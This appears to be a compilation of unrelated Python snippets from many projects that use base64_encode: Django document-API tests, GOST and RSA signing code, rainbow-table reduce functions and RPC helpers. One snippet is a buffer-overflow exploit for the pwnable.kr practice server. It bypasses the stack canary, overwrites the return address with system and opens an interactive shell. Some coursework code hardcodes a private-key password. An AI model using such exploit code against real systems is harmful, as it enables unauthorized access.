def test_create_large_document(self): self.login_admin() large_body = 1024 * 1024 * 25 * 'x' self.assertEqual(1024 * 1024 * 25, len(large_body)) document = self.acc_post_json('api-documents-documents-list', { 'body': base64_encode(large_body)[0], 'name': 'The file.docx', 'folder': Folder.objects.get_account_root(self.account).id, }).json() document = self.acc_get('api-documents-documents-download', pk=document['id']) self.assertEqual(large_body, document.content) # Same thing, but check plan failure self.account.plan.max_storage = 10000 self.account.plan.save() self.account.refresh_from_db() storage_before = self.account.total_storage document = self.acc_post_json('api-documents-documents-list', { 'body': base64_encode(large_body)[0], 'name': 'The file.docx', 'folder': Folder.objects.get_account_root(self.account).id, }, assert_status_code=400).json() self.assertEqual('Limit of data storage for your billing plan is exceeded, you can upgrade it in your profile!', document['message']) self.account.refresh_from_db() self.assertEqual(storage_before, self.account.total_storage)
def test_update_file(self): """ Demonstrates update sequence """ self.login_admin() folder = self.membership_admin.private_folder # 1. Upload the file document = self.acc_post_json('api-documents-documents-list', { 'body': base64_encode('Hi there!')[0], 'name': 'The file.docx', 'folder': folder.id, }).json() # 2. Upload replacement replaced = self.acc_post_json('api-documents-documents-list', { 'body': base64_encode('Hi there! Replaced!')[0], 'name': 'The file.docx', 'folder': folder.id, 'old_doc': document['id'], # Provide 'old_doc' }).json() # 3. Delete original document, providing update change self.acc_delete('api-documents-documents-detail', pk=document['id'], json_data={'change_type': AuditTrail.UPDATED}) # AuditTrail.UPDATED == 0 self.assertEqual(0, Document.objects.filter(pk=document['id']).count()) self.assertEqual(1, Document.objects.filter(pk=replaced['id']).count()) self.assertEqual(1, AuditTrail.objects.filter(latest_version=replaced['id']).count()) # 4. Fetch replaced object again and get revisions list replaced = self.acc_get('api-documents-documents-detail', pk=replaced['id']).json() revisions = replaced['revisions'] self.assertEqual(1, len(revisions)) self.assertEqual(AuditTrail.UPDATED, revisions[0]['change_type']) self.assertEqual(self.admin.id, revisions[0]['user']) self.assertEqual(1, revisions[0]['revision']) # 5. Fetch revision contents: use new document id and revision old_body = self.acc_get('api-documents-documents-download-revision', pk=replaced['id'], revision=1).content self.assertEqual('Hi there!', old_body) documents = self.acc_get('api-documents-documents-list', data={'folder': self.membership_admin.private_folder.id}).json() self.assertEqual(1, len(documents)) self.assertEqual(1, len(documents[0]['revisions'])) # Check access is checked self.login_member() self.acc_get('api-documents-documents-download-revision', pk=replaced['id'], revision=1, assert_status_code=403)
def get_file_hash(self, file_path): csptest_path = 'C:\\Program Files (x86)\\Crypto Pro\\CSP\\csptest.exe' if not os.path.exists(csptest_path): csptest_path = 'C:\\Program Files\\Crypto Pro\\CSP\\csptest.exe' hashtmp_f, hashtmp_fn = tempfile.mkstemp() os.close(hashtmp_f) args = [ csptest_path, 'csptest.exe', '-keyset', '-hash', 'GOST', '-container', self.__container, '-keytype', 'exchange', '-in', os.path.abspath(file_path), '-hashout', hashtmp_fn ] try: out = subprocess.check_output(args, stderr=subprocess.STDOUT) self.log.debug(out.decode(encoding='cp866')) with open(hashtmp_fn, 'rb') as f: hsh = f.read() hsh_bytes = base64_encode(hsh)[0][:-1].decode().replace('\n', '') # hsh_bytes = base64_encode(hsh)[0].decode().replace('\n', '') return hsh_bytes except: if 'out' in locals(): self.log.error(out.decode(encoding='cp866')) raise finally: os.remove(hashtmp_fn)
def __encode_high_scores(high_score_list): # -- Jsonify the pairs high_score_list_encoded = json.dumps(high_score_list) # -- Pass the utf-8 encoded points to the b64 encoder - They have to first be utf-8 encoded high_score_list_encoded_b64 = base64.base64_encode( high_score_list_encoded.encode('utf-8')) return high_score_list_encoded_b64[0].decode('utf-8')
def test_delete(self): self.login_admin() root = Folder.objects.get_account_root(self.account) file_contents = 'Hi there!' document = self.acc_post_json('api-documents-documents-list', { 'body': base64_encode(file_contents)[0], 'name': 'The file.docx', 'folder': root.id, }).json() self.assertEqual(1, RecentActivity.objects.filter(account=self.account, content_type=ContentType.objects.get_for_model(Document), object_id=document['id'], action_flag=RecentActivity.ADDITION).count()) self.acc_delete('api-documents-documents-detail', pk=document['id']) # Recent activity is dropped self.assertEqual(0, RecentActivity.objects.filter(account=self.account, content_type=ContentType.objects.get_for_model(Document), object_id=document['id'], action_flag=RecentActivity.ADDITION).count()) revisions = list(AuditTrail.objects.filter(latest_version=document['id'])) self.assertEqual(1, len(revisions)) self.assertEqual(AuditTrail.DELETED, revisions[0].change_type)
def sign_file(password, file_to_sign, private_key_file, sig_filename): backend = default_backend() myhash, digest = getMyhashDigest(file_to_sign) #load the private key from task 2 password = bytes(password, 'utf-8') with open(private_key_file, 'rb') as file: private_key = serialization.load_pem_private_key(data=file.read(), password=password, backend=backend) # hashed data needs to be padded so it fits correctly pad = asympadding.PKCS1v15() sig = base64_encode( private_key.sign(data=digest, padding=pad, algorithm=utils.Prehashed(myhash)))[0] sig_file = open(sig_filename, "wb") sig_file.write(b"-----BEGIN SIGNATURE-----\n") sig_file.write(sig) sig_file.write(b"-----END SIGNATURE-----\n") sig_file.close()
def reduce(digest_hex): b64_representation = base64_encode(bytes.fromhex(digest_hex)) #print("b64 representation", b64_representation) #print("b64[0]", b64_representation[0]) #print("b64[1]", b64_representation[1]) new_password2 = "" for i in range(len(b64_representation[0])): #print("byte", byte) #print("decode byte", chr(byte)) decoded_byte = chr(b64_representation[0][i]) if decoded_byte.isalpha(): if decoded_byte.upper() in alphabet: new_password2 = new_password2 + decoded_byte.upper() if len(new_password2) == 5: break new_password = "" generated_password = b64_representation[0][:5] # First 5 characters generated_password = generated_password.decode() # print("generated password", generated_password) new_password = "" for i in range(len(generated_password)): new_password = new_password + alphabet[ord(generated_password[i]) % len(alphabet)] # print("new password 2", new_password2) # print(new_password) # for i in range(len(generated_password)): # new_password = new_password + alphabet[ord(generated_password[i]) % len(alphabet)] if len(new_password2) != 5: print("reduce not to 5") return new_password2
def sign_file(file_name, backend_sign): with open(file_name, 'rb') as file: data_to_encrypt = file.read() myhash = hashes.SHA256() hasher_sha256 = hashes.Hash(myhash, backend) hasher_sha256.update(data_to_encrypt) digest = hasher_sha256.finalize() #load the private key from task 2 password = bytes("hello", 'utf-8') with open("kr.pem", 'rb') as file: private_key = serialization.load_pem_private_key(data=file.read(), password=password, backend=backend_sign) # hashed data needs to be padded so it fits correctly pad = asympadding.PSS(mgf=asympadding.MGF1(hashes.SHA256()), salt_length=asympadding.PSS.MAX_LENGTH) sig = base64_encode( private_key.sign(data=digest, padding=pad, algorithm=utils.Prehashed(myhash)))[0] sig_file = open("file.sig", "wb") sig_file.write(b"-----BEGIN SIGNATURE-----\n") sig_file.write(sig) sig_file.write(b"-----END SIGNATURE-----\n") sig_file.close() print("Signed file with private key and wrote to file.sig")
def __init__(self, value_id: int, data: bytes, *args, **kwargs): super().__init__(rpc_command="STORE", command_arg={ "value_id": str(value_id), "data": str(base64_encode(data)) }, *args, **kwargs)
def testReadSingleImage(self): f = open('../../../../data/test-images/cat_programming.png', "rb") file_bytes = bytearray(f.read()) len_bytes = bytearray(struct.pack('>i', len(file_bytes))) _, images = self.protocol.read(f.name + '\t' + base64_encode(str(len_bytes + file_bytes))[0]) exp = skio.imread('../../../../data/test-images/cat_programming.png') assert_array_equal(images[0], exp)
def testReadSingleImage(self): f = open('../../../../data/test-images/cat_programming.png', "rb") file_bytes = bytearray(f.read()) len_bytes = bytearray(struct.pack('>i', len(file_bytes))) _, images = self.protocol.read( f.name + '\t' + base64_encode(str(len_bytes + file_bytes))[0]) exp = skio.imread('../../../../data/test-images/cat_programming.png') assert_array_equal(images[0], exp)
def testReadMultipleImages(self): f = open('../../../../data/test-images/cat_programming.png', "rb") file_bytes = bytearray(f.read()) len_bytes = bytearray(struct.pack('>i', len(file_bytes))) # five times the same image _, images = self.protocol.read(f.name + '\t' + base64_encode(str(len_bytes + file_bytes))[0]*5) exp = skio.imread('../../../../data/test-images/cat_programming.png') for img in images: assert_array_equal(img, exp)
def _getHeaders(self, acceptType="application/json", contentType="application/json", x_forwarded_host=None): headers = {"Accept": acceptType, "Content-type": contentType} credential_encode, len = base64_encode("%s:%s" % (self.username, self.password)) headers['Authorization'] = "Basic " + str(credential_encode).rstrip( ) # sr().rstrip() is used in case there is no newline behind. return headers
def testReadMultipleImages(self): f = open('../../../../data/test-images/cat_programming.png', "rb") file_bytes = bytearray(f.read()) len_bytes = bytearray(struct.pack('>i', len(file_bytes))) # five times the same image _, images = self.protocol.read( f.name + '\t' + base64_encode(str(len_bytes + file_bytes))[0] * 5) exp = skio.imread('../../../../data/test-images/cat_programming.png') for img in images: assert_array_equal(img, exp)
def reduce2(digest): b64_representation = base64_encode(digest) new_password = "" for m in range(len(b64_representation)): one_byte = bytes([b64_representation[m]]) char = one_byte.decode() print("char", char) if char.isalpha(): new_password = char.upper() + new_password print("new password", new_password) if len(new_password) == 5: break return new_password
def to_dict_representation(self): sending_node = { "id": self.node.node_id, "ip": self.node.ip_info[0], "port": self.node.ip_info[1] } rpc = {"node": sending_node} rpc.update({"type": self.rpc_type}) # append RPC parts from children class if self.append_part: rpc.update(self.append_part) rpc_uuid_b64 = base64_encode(self.rpc_uuid.bytes)[0].decode() rpc.update({"rpc_uuid": rpc_uuid_b64}) return rpc
def test_meeting_documents(self): self.login_admin() document = self.acc_post_json( 'api-documents-documents-list', { 'body': base64_encode('test document')[0], 'name': 'The file.docx', 'type': Document.BOARD_BOOK, 'folder': None, }).json() meeting_json = self.acc_post_json( 'api-meetings-meetings-list', { 'start': (now().replace(tzinfo=pytz.utc, hour=12, minute=0, second=0, microsecond=0) + timedelta(days=1)).isoformat(), 'end': (now().replace(tzinfo=pytz.utc, hour=13, minute=0, second=0, microsecond=0) + timedelta(days=1)).isoformat(), 'name': 'Test meeting', 'description': 'describe it! Now.', 'location': 'in memory', 'committee': None, 'documents': [document['id']], 'extra_members': [], }).json() details = self.acc_get('api-meetings-meetings-detail', pk=meeting_json['id']).json() self.assertTrue(details['board_book']) document = self.client.get(details['board_book']['download_url']) self.assertEqual('test document', document.content)
def __init__(self, url, user=None, passwd=None, basic_token=None, **kwargs): extra_headers = { 'accept': 'application/json', 'content-type': 'application/json' } if user is not None and passwd is not None: user_pass = bytes("%s:%s" % (user, passwd), 'utf-8') basic_token = base64_encode(user_pass) if basic_token is not None: auth = "Basic %s" % str(basic_token) extra_headers['authorization'] = auth props = ConnectionProperties( api_url=kwargs.pop('api_url', url), secure_http=True, extra_headers=extra_headers, url_prefix='/rest/api/2' ) self.setClient(Client()) self.setConnectionProperties(props)
def main() -> None: # Iterate over several time diffs since there's a changing delay between connecting to # the pwnable.kr server and generating the hash locally. Since the timestamp for generating # the hash must be the exact same as the remote. for time_diff in range(-5, 1): # Get the original hash connection = remote('pwnable.kr', 9002) # Get the captcha (hash) from the connection connection.readuntil(':') original_hash = int(connection.read().decode().strip()) # Calculate the canary value canary = calculate_canary(original_hash, time_diff) # Response to the captcha connection.sendline(str(original_hash).encode()) # Craft the payload and send it payload = b'A' * BUFFER_SIZE + p32(canary) + 12 * b'A' + p32( SYSTEM_CALL_ADDRESS) payload += p32(G_BUF_ADDRESS + calculate_base64_length(len(payload) + 4)) payload = base64_encode(payload)[0].replace(b'\n', b'') + SHELL_COMMAND connection.sendline(payload) # Receive 4 lines, which actually means, read until received stack smashing detected. # If the timeout reached and 4 lines were not received, We managed to open a shell :) output = b'\n'.join(connection.recvlines(4, timeout=3)).decode() if 'stack smashing detected' not in output: # Make interactive to get the gained shell :) connection.interactive() break else: print(f'with diff {time_diff}: Stack smashing detected :(')
def read_from_file(aPath, encode=True): aFile = open(aPath, 'rU') if encode: return base64_encode(aFile.read())[0] else: return aFile.read()
def encode_base64(string_to_encode): return base64_encode(string_to_encode)[0]
print('Zeit bis zum nächsten Selbsttest:', TSE.info.timeUntilNextSelfTest) print('Zeit zwischen zwei Time-Syncs:', TSE.info.maxTimeSynchronizationDelay) print('Maximale Dauer einer offenen Transaktion:', TSE.info.maxUpdateDelay) print('Zahl der offenen Transaktionen: %i / %i' % (TSE.info.startedTransactions, TSE.info.maxStartedTransactions)) print('Zahl der bisherigen Signaturen: %i / %i (noch %i übrig)' % (TSE.info.createdSignatures, TSE.info.maxSignatures, TSE.info.remainingSignatures)) print('TSE-Beschreibung:', TSE.info.tseDescription, 'Customization:', TSE.info.customizationIdentifier.decode('ascii')) print('Signatur-Algorithmus:', TSE.signatureAlgorithm()) print('Pubkey:', base64_encode(TSE.info.tsePublicKey)) print('Serial:', bytes(TSE.info.tseSerialNumber).hex()) print('Zahl der aktiven Clients: %i / %i' % (TSE.info.registeredClients, TSE.info.maxRegisteredClients)) print('Zertifikat-Ablaufdatum:', TSE.info.certificateExpirationDate) print('Log-Time-Format:', TSE.logTimeFormat()) print('Hardware-Version: %i.%i.%i' % TSE.info.hardwareVersion) print('Software-Version: %i.%i.%i' % TSE.info.softwareVersion) print('Library-Version:', TSE.getVersion()) print('TSE Form-Factor:', TSE.info.formFactor) TSE.flash_health_summary() if len(sys.argv) > 1 and sys.argv[1] == '--reset':
def test_document(self): self.login_admin() # Test create # =========== error = self.acc_post_json('api-documents-documents-list', {}, assert_status_code=400).json() self.assertEqual({ "body": ["This field is required."], "name": ["This field is required."], 'folder': ['This field is required.'], 'detail': WRONG_REQUEST}, error) root = Folder.objects.get_account_root(self.account) storage_before = self.account.total_storage file_contents = 'File contents' document = self.acc_post_json('api-documents-documents-list', { 'body': base64_encode(file_contents)[0], 'name': 'The file.docx', 'folder': root.id, }).json() self.assertEqual('The file.docx', document['name']) # Check that storage is updated self.account.refresh_from_db() self.assertEqual(len(file_contents), self.account.total_storage - storage_before) self.assertEqual(1, RecentActivity.objects.filter(account=self.account, content_type=ContentType.objects.get_for_model(Document), object_id=document['id'], action_flag=RecentActivity.ADDITION).count()) documents = self.acc_get('api-documents-documents-list').json() self.assertEqual(1, len(documents)) self.assertEqual(document['id'], documents[0]['id']) document_content = self.acc_get('api-documents-documents-download', pk=document['id']) self.assertEqual(file_contents, document_content.content) # Update: # ----------- updated_document = dict(document) updated_document['name'] = 'Updated.docx' updated_document['content'] = 'MUST BE IGNORED' self.acc_put_json('api-documents-documents-detail', pk=document['id'], json_data=updated_document) self.assertEqual(1, RecentActivity.objects.filter(account=self.account, content_type=ContentType.objects.get_for_model(Document), object_id=document['id'], action_flag=RecentActivity.CHANGE).count()) check_document = self.acc_get('api-documents-documents-detail', pk=document['id']).json() self.assertEqual('Updated.docx', check_document['name']) document_content = self.acc_get('api-documents-documents-download', pk=document['id']) self.assertEqual(file_contents, document_content.content) # Check move sub_folder = Folder.objects.create(parent=root, name='Test sub_folder', account=self.account) updated_document['folder'] = sub_folder.id self.acc_put_json('api-documents-documents-detail', pk=document['id'], json_data=updated_document) sub_folder.refresh_from_db() self.assertEqual(1, len(sub_folder.documents.all())) self.assertEqual('Updated.docx', sub_folder.documents.all()[0].name) # Delete it: # -------- self.acc_delete('api-documents-documents-detail', pk=document['id']) self.acc_get('api-documents-documents-detail', pk=document['id'], assert_status_code=404)
def test_access(self): # All previous tests used admin, which is kind of a god, i.e. can do anything. Let's test common member. self.login_member() root = Folder.objects.get_account_root(self.account) # User can't create folders in root self.acc_post_json('api-documents-folders-list', { 'name': "The folder", 'parent': root.id }, assert_status_code=403) # Nor documents self.acc_post_json('api-documents-documents-list', { 'body': base64_encode('File contents')[0], 'name': 'The file.docx', 'folder': root.id, }, assert_status_code=403) # He can, inside his own folder folder = self.acc_post_json('api-documents-folders-list', { 'name': "The folder", 'parent': self.membership.private_folder.id }).json() # And subfolder of it sub_folder = self.acc_post_json('api-documents-folders-list', { 'name': "The subfolder", 'parent': folder['id'] }).json() # And files document = self.acc_post_json('api-documents-documents-list', { 'body': base64_encode('File contents')[0], 'name': 'The file.docx', 'folder': self.membership.private_folder.id, }).json() # And move documents document['folder'] = sub_folder['id'] self.acc_put_json('api-documents-documents-detail', pk=document['id'], json_data=document) # But not in other's folder: self.acc_post_json('api-documents-folders-list', { 'name': "The folder", 'parent': self.membership_admin.private_folder.id, }, assert_status_code=403) # Nor documents self.acc_post_json('api-documents-documents-list', { 'body': base64_encode('File contents')[0], 'name': 'The file.docx', 'folder': self.membership_admin.private_folder.id, }, assert_status_code=403) # And can't into committee he isn't in committee = CommitteeFactory(chairman=self.membership_admin) self.assertTrue(committee.folder) self.acc_post_json('api-documents-folders-list', { 'name': "The folder", 'parent': committee.folder.id, }, assert_status_code=403) # Nor documents self.acc_post_json('api-documents-documents-list', { 'body': base64_encode('File contents')[0], 'name': 'The file.docx', 'folder': committee.folder.id, }, assert_status_code=403) # But can as soon as he becomes a member committee.memberships.add(self.membership) self.acc_post_json('api-documents-folders-list', { 'name': "The folder", 'parent': committee.folder.id, }) # Nor documents self.acc_post_json('api-documents-documents-list', { 'body': base64_encode('File contents')[0], 'name': 'The file.docx', 'folder': committee.folder.id, }) # Other account must have no access to our documents, let's just check it self.init_second_account() self.login_admin2() self.acc_get('api-documents-documents-list', assert_status_code=403) self.acc_post_json('api-documents-documents-list', { 'body': base64_encode('File contents')[0], 'name': 'The file.docx', 'folder': root.id, }, assert_status_code=403)
def sign_csp(self, xml): csptest_path = 'C:\\Program Files (x86)\\Crypto Pro\\CSP\\csptest.exe' intmp_f, intmp_fn = tempfile.mkstemp() outtmp_f, outtmp_fn = tempfile.mkstemp() hashtmp_f, hashtmp_fn = tempfile.mkstemp() try: if isinstance(xml, str): xml = xml.encode() os.write(intmp_f, xml) os.close(intmp_f) os.close(outtmp_f) os.close(hashtmp_f) args = [ csptest_path, 'csptest.exe', '-keyset', '-sign', 'GOST', '-hash', 'GOST', '-container', self.__container, '-keytype', 'exchange', '-in', intmp_fn, '-out', outtmp_fn, '-hashout', hashtmp_fn ] out = subprocess.check_output(args, stderr=subprocess.STDOUT) self.log.debug(out.decode(encoding='cp866')) with open(outtmp_fn, 'rb') as f: sgn = f.read() sgn = sgn[::-1] sign = base64_encode(sgn)[0][:-1].decode().replace('\n', '') with open(hashtmp_fn, 'rb') as f: hsh = f.read() hsh_bytes = base64_encode(hsh)[0][:-1].decode().replace('\n', '') except subprocess.CalledProcessError as e: self.log.error(e.output.decode(encoding='cp866')) raise finally: os.remove(intmp_fn) os.remove(outtmp_fn) os.remove(hashtmp_fn) outtmp_f, outtmp_fn = tempfile.mkstemp() try: os.close(outtmp_f) args = [ csptest_path, 'csptest.exe', '-keyset', '-container', self.__container, '-keytype', 'exchange', '-expcert', outtmp_fn ] out = subprocess.check_output(args, stderr=subprocess.STDOUT) self.log.debug(out.decode(encoding='cp866')) with open(outtmp_fn, 'rb') as f: crt = f.read() cert = base64_encode(crt)[0][:-1] except subprocess.CalledProcessError as e: self.log.error(e.output.decode(encoding='cp866')) return e.output.decode(encoding='cp866') finally: os.remove(outtmp_fn) if b'Signature xmlns' in xml: # TODO: Template signature pass return '<ds:Signature ' \ 'xmlns:ds="http://www.w3.org/2000/09/xmldsig#">' \ '<ds:SignedInfo>' \ '<ds:CanonicalizationMethod ' \ 'Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>' \ '<ds:SignatureMethod ' \ 'Algorithm="http://www.w3.org/2001/04/xmldsig-more#gostr34102001-gostr3411"/>' \ '<ds:Reference URI="#SIGNED_BY_CALLER"><ds:Transforms>' \ '<ds:Transform ' \ 'Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>' \ '<ds:Transform ' \ 'Algorithm="urn://smev-gov-ru/xmldsig/transform"/>' \ '</ds:Transforms>' \ '<ds:DigestMethod ' \ 'Algorithm="http://www.w3.org/2001/04/xmldsig-more#gostr3411"/>' \ '<ds:DigestValue>' + hsh_bytes + \ '</ds:DigestValue></ds:Reference></ds:SignedInfo>' \ '<ds:SignatureValue>' + sign + \ '</ds:SignatureValue><ds:KeyInfo><ds:X509Data>' \ '<ds:X509Certificate>' + cert.decode() + \ '</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature>'
with open("encryptme.txt", 'rb') as file: data_to_encrypt = file.read() myhash = hashes.SHA256() hasher_sha256 = hashes.Hash(myhash, backend) hasher_sha256.update(data_to_encrypt) digest = hasher_sha256.finalize() #load the private key from task 2 password = bytes("hello", 'utf-8') with open("kr.pem", 'rb') as file: private_key = serialization.load_pem_private_key(data=file.read(), password=password, backend=backend) # hashed data needs to be padded so it fits correctly pad = padding.PSS(mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH) sig = base64_encode( private_key.sign(data=digest, padding=pad, algorithm=utils.Prehashed(myhash)))[0] sig_file = open("file.sig", "wb") sig_file.write(b"-----BEGIN SIGNATURE-----\n") sig_file.write(sig) sig_file.write(b"-----END SIGNATURE-----\n") sig_file.close()